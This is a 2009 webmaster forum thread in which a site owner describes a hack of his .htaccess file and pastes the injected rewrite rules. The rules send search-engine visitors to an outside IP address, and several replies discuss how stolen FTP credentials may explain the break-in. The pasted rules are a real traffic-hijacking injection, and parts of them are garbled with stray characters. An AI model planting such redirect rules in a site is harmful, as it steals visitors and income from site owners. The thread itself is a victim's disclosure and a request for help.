homepage Welcome to WebmasterWorld Guest from 174.129.130.202
register, free tools, login, search, pro membership, help, library, announcements, recent posts, open posts,
Become a Pro Member
Home / Forums Index / WebmasterWorld / Webmaster General
Forum Library, Charter, Moderators: phranque & physics

Webmaster General Forum

    
.htaccess Hijacking Search Engine Traffic
.htaccess hacked
josjongejan




msg:3848198
 6:39 pm on Feb 12, 2009 (gmt 0)

If you suddenly find your traffic dropping over 90% and upon investigating find out that

- Your site loads fine
- Your DNS / host is fine
- Your rankings haven't changed
- All your search engine traffic is gone and remaining traffic is mostly direct visitors or referals from a non-search engine site?

Well that's what happened to me.

Upon investigating, I found out the following was added to my .htaccess file:

RewriteCond %{HTTP_REFERER} ^.*(google\.妃sn\.奸ive\.com尖ahoo\.地ltavista\.地ol\.地sk\.圯ureka\.com奸ycos\.com多otbot\.com夷nfoseek\.com安ebcrawler\.圯xcite\.好etscape\.com妃amma\.com地lltheweb\.com好orthernlight\.com字ambler\.ru地port\.ru尖andex\.ru如ingwin\.ru安ww\.ru如unto\.ru存earch\.comcast\.net地bcsok\.no妃yspace\.com奸ooksmart\.com).* [NC]
RewriteRule ^(.*) /501.html [NS,NC,L]

RewriteCond %{HTTP_USER_AGENT} ^.*(bot守rp妃sn).* [NC]
RewriteRule ^(.*) $1 [NS,NC,L]
Redirect /501.html http://<ip removed>

My .htaccess file is not chmodded 777 or anything crazy nor are any other files/folders on my ftp.
I also don't use any open source software (e.g. wordpress, vbulletin, etc.)

I have no clue why this happened to me. I googled the ip address and only found 1 other site that this happened to.

I hope this doesn't happen to you but if it did and you googled the ip I hope you find this thread so you can resolve the issue quickly.

It took me 3 days to figure this out and I lost a lot of traffic and consequently income from this little hijack.

I have asked my host to scan the server for rootkits and I changed my ftp password.

I am still seeking an explanation for how this code ended up in my .htaccess though so any information that may lead to that answer is greatly appreciated.

[edited by: physics at 9:21 pm (utc) on Feb. 12, 2009]

[edited by: phranque at 7:56 am (utc) on Feb. 13, 2009]
[edit reason] IP address removed. No specifics please. [/edit]

 

jdMorgan




msg:3848273
 8:46 pm on Feb 12, 2009 (gmt 0)

We had a thread here recently where a victim of a similar exploit found malware on his own PC that may have allowed his server login info to be captured from his PC and reported to persons unknown. He had found code very similar to what you posted above in his .htaccess file.

The code on his site shared some similarity to what you posted here, in that it was poorly-coded, and probably didn't work quite as intended.

Jim

physics




msg:3848315
 9:33 pm on Feb 12, 2009 (gmt 0)

josjongejan, what OS is your site running on?
Are you using cpanel?
As jdMorgan mentioned maybe the exploit came from your PC. Did you try running a full virus scan?

josjongejan




msg:3848503
 4:43 am on Feb 13, 2009 (gmt 0)

It's a cPanel server from [snip] not sure on the platform but I'm guessing it's either Linux or FreeBSD

Just did a full scan with McAfee latest definitions too, nothing found.

In my 12 years online I've never been infected by a virus, I'm pretty careful/aware

Thanks for the replies so far, I appreciate your time and effort

[edited by: phranque at 7:56 am (utc) on Feb. 13, 2009]
[edit reason] No urls, please. See TOS [webmasterworld.com] [/edit]

Global Options:
 top home search open messages active posts  
 

Home / Forums Index / WebmasterWorld / Webmaster General
rss feed

All trademarks and copyrights held by respective owners. Member comments are owned by the poster.
Home ¦ Free Tools ¦ Terms of Service ¦ Privacy Policy ¦ Report Problem ¦ About ¦ Library ¦ Newsletter
WebmasterWorld is a Developer Shed Community owned by Jim Boykin.
© Webmaster World 1996-2014 all rights reserved